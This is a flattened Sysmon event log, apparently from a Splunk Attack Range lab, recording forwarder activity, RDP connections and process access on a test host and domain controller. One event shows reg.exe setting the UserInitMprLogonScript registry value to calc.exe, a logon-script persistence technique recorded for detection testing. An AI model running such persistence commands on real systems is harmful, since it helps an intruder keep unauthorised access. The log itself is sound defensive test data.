Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6DA94E601EEFC0F0C6DCE4931C3EE862,SHA256=A50B9E28CC632553E47BDE871D9BAAA9AAE2396B428D657C96C36228B5D56ECB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981953Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:09.827{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2CDD3EB6D863DB9D715049F402C10DF3,SHA256=9797F70CF1C0F09D42EF1F6B64C843569192260FBEFAD5759F2764C52311C721,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000981952Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:06.555{69CF5F33-7F28-614D-1100-00000000FD01}960C:\Windows\System32\svchost.exeNT AUTHORITY\LOCAL SERVICEudptruefalse10.0.1.15win-host-542.attackrange.local123ntpfalse20.101.57.9-123ntp 354300x8000000000000000981951Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:06.555{69CF5F33-7F28-614D-1100-00000000FD01}960C:\Windows\System32\svchost.exeNT AUTHORITY\LOCAL SERVICEudptruefalse10.0.1.15win-host-542.attackrange.local123ntpfalse10.0.1.14-123ntp 23542300x8000000000000000981950Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:09.030{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C6DC0428CA3B6C9E6CDAEB1782D8A636,SHA256=0B53374FF945B23527AEEB48E604BE2B19B81BB0DB9BAC3F87A70C025BCDBB25,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057584Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:10.617{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=661303885B9C2199DFF8D18AA0EB142F,SHA256=156933C40D900E70B1E1FAF281ECBF08200314C1E924235F8B4F886AC446E710,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000981956Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:06.758{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-52806-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000981955Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:10.030{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=558FC6D254CE3C9D16C6CB6908460622,SHA256=C42206C7834E3A05502653A159FE1A9954A80622A1212D7828FD2964FFF6D731,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057585Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:11.820{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CC42B6870B7CAE4410A597BA7DF26A0B,SHA256=7A81FF8790993600E17113EC545894176BEE6F535D1674EDDBF37311E8BC4D5A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981957Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:11.249{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=040B2C61D69A580498543A811EA4277A,SHA256=A4B7F0B6C835F831CABF736AB2508CE98C5E53D72044F3F1A7B046DB1B6F93D3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057586Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:12.961{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A7D0CA5A3AC91BE7A5D5434C5E0B901A,SHA256=DDF65FB4BCEA90A802DCCD8647FC9589D8BB00CA1F45325D044E36797F299A52,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981958Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:12.374{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5C86332C720D9438F7FC61D97B31532C,SHA256=6749691129DC3E5E86965BCAF481BD65B38E826AACE73F063C1B11DA8C276401,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981959Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:13.577{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6AA74B7BD32777182F28C564B93C86E6,SHA256=0C032993A6358E2BED1C505D2F68F988B70F8801135F25A3C81BF4B1079F73B9,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001057593Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:13.867{5EBD8912-8D2A-6151-9600-00000000FD01}46324940C:\Windows\Explorer.EXE{5EBD8912-8E1C-6151-C800-00000000FD01}3608C:\Windows\system32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6162f|C:\Windows\System32\SHELL32.dll+62f15|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057592Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:13.867{5EBD8912-8D2A-6151-9600-00000000FD01}46324940C:\Windows\Explorer.EXE{5EBD8912-8E1C-6151-C800-00000000FD01}3608C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+62e2e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057591Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:13.867{5EBD8912-8D2A-6151-9600-00000000FD01}46324940C:\Windows\Explorer.EXE{5EBD8912-8E1C-6151-C800-00000000FD01}3608C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61884|C:\Windows\System32\SHELL32.dll+62df7|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057590Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:13.867{5EBD8912-8D2A-6151-9600-00000000FD01}46324904C:\Windows\Explorer.EXE{5EBD8912-8E1C-6151-C900-00000000FD01}1672C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6162f|C:\Windows\System32\SHELL32.dll+62890|C:\Windows\System32\TwinUI.dll+f54e1|C:\Windows\System32\TwinUI.dll+f5d4f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057589Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:13.867{5EBD8912-8D2A-6151-9600-00000000FD01}46324904C:\Windows\Explorer.EXE{5EBD8912-8E1C-6151-C900-00000000FD01}1672C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47bc0|C:\Windows\System32\SHELL32.dll+6284c|C:\Windows\System32\TwinUI.dll+f54e1|C:\Windows\System32\TwinUI.dll+f5d4f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057588Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:13.867{5EBD8912-8D2A-6151-9600-00000000FD01}46324904C:\Windows\Explorer.EXE{5EBD8912-8E1C-6151-C900-00000000FD01}1672C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61884|C:\Windows\System32\SHELL32.dll+62820|C:\Windows\System32\TwinUI.dll+f54e1|C:\Windows\System32\TwinUI.dll+f5d4f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057587Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:13.867{5EBD8912-8D2A-6151-9600-00000000FD01}46324904C:\Windows\Explorer.EXE{5EBD8912-8E1C-6151-C900-00000000FD01}1672C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+f5319|C:\Windows\System32\TwinUI.dll+f5d4f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x8000000000000000981962Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:11.837{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59580-false10.0.1.12-8000- 23542300x8000000000000000981961Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:14.686{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7DF71B6F62D0695BD86067334FDFF26A,SHA256=3526C031A734C2FE4FE0509F1E7BD032FA40C624090FE25534583B56584474BD,IMPHASH=00000000000000000000000000000000falsetrue 13241300x80000000000000001057604Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:27:14.867{5EBD8912-8E72-6151-D300-00000000FD01}5864C:\Windows\system32\reg.exeHKU\S-1-5-21-2741910449-3045839080-4200281267-500\Environment\UserInitMprLogonScriptC:\Windows\System32\calc.exe 10341000x80000000000000001057603Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:14.867{5EBD8912-8E1C-6151-C900-00000000FD01}16725488C:\Windows\system32\conhost.exe{5EBD8912-8E72-6151-D300-00000000FD01}5864C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057602Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:14.867{5EBD8912-8D26-6151-8500-00000000FD01}27602120C:\Windows\system32\csrss.exe{5EBD8912-8E72-6151-D300-00000000FD01}5864C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001057601Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:14.867{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057600Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:14.867{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057599Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:14.867{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057598Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:14.867{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057597Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:14.867{5EBD8912-8E1C-6151-C800-00000000FD01}36082268C:\Windows\system32\cmd.exe{5EBD8912-8E72-6151-D300-00000000FD01}5864C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+1ace3|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001057596Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:14.872{5EBD8912-8E72-6151-D300-00000000FD01}5864C:\Windows\System32\reg.exe10.0.14393.0 (rs1_release.160715-1616)Registry Console ToolMicrosoft® Windows® Operating SystemMicrosoft Corporationreg.exereg add HKCU\Environment /v UserInitMprLogonScript /t REG_SZ /d C:\Windows\System32\calc.exeC:\Users\Administrator\ATTACKRANGE\Administrator{5EBD8912-8D28-6151-085E-080000000000}0x85e082HighMD5=59A22FA6CF85026BB6BC69A1ADD75C50,SHA256=9E28034CE3AEEA6951F790F8997DF44CFBF80BEFF9FB17413DBA317016A716AD,IMPHASH=EE7EB7FA7D163340753B7223ADA14352{5EBD8912-8E1C-6151-C800-00000000FD01}3608C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" 354300x80000000000000001057595Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:13.104{5EBD8912-8CDC-6151-6E00-00000000FD01}2608C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local54303-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001057594Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:14.101{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FB4BEFDDEE5F50905FF8F0E46587CAB6,SHA256=B5C83C5BEFB07581D663801D2462F4F6AF3B795D3A9D10C73B6F8D8FA724EECE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981960Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:14.030{69CF5F33-7F29-614D-1D00-00000000FD01}1960NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=72F9D15A308A3AFACD92589D17F2C03E,SHA256=E0EA3012FF17D797A034C0E7F787325C50EBFE6C56FB1128CC9B4A2A94A03D83,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000981964Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:12.650{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59581-false10.0.1.12-8089- 23542300x8000000000000000981963Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:15.920{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8D439B54B36EF1C9EACE41906890A43E,SHA256=5D697E0C413B56327AB13134E7EA61FED109E35C6B31D7E6B83DE1908BC6BF86,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057608Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:15.851{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CF4A9FBE7971BA90236BEF861891A180,SHA256=41D9692FDE429EC8D09DD4B77D1A234F9999585EB0AE6632C2617C09268BF451,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057607Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:15.851{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=586B4D429FA737D560D42172BA193701,SHA256=723A4AC04459D04B18BD48A2976E2BA7B1F606DE1D97A3BEFBA0D3E9AC872248,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057606Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:15.633{5EBD8912-8CD0-6151-3000-00000000FD01}1956NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=72F9D15A308A3AFACD92589D17F2C03E,SHA256=E0EA3012FF17D797A034C0E7F787325C50EBFE6C56FB1128CC9B4A2A94A03D83,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057605Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:15.101{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=15CA221564FBB97CA2D1C48400375BF9,SHA256=63EDC099302194C12A0EC984F2B1BC8C5B56CF789B9353A71E0614C4C206E0A7,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001057618Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:15.558{5EBD8912-8CD0-6151-3000-00000000FD01}1956C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local54304-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8089- 354300x80000000000000001057617Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:15.403{5EBD8912-8CC0-6151-0F00-00000000FD01}300C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse181.214.206.115-53864-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001057616Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:16.101{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0E54EA3B1A5564FAC596870558BFBDCF,SHA256=7F94238D07DF0425CA49951156A28E5D613CFE97BDFD63B19FAC524E681B7CA3,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001057615Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:16.070{5EBD8912-8D2A-6151-9600-00000000FD01}46324940C:\Windows\Explorer.EXE{5EBD8912-8D80-6151-AF00-00000000FD01}5156C:\Windows\regedit.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6162f|C:\Windows\System32\SHELL32.dll+62f15|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057614Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:16.070{5EBD8912-8D2A-6151-9600-00000000FD01}46324940C:\Windows\Explorer.EXE{5EBD8912-8D80-6151-AF00-00000000FD01}5156C:\Windows\regedit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+62e2e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057613Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 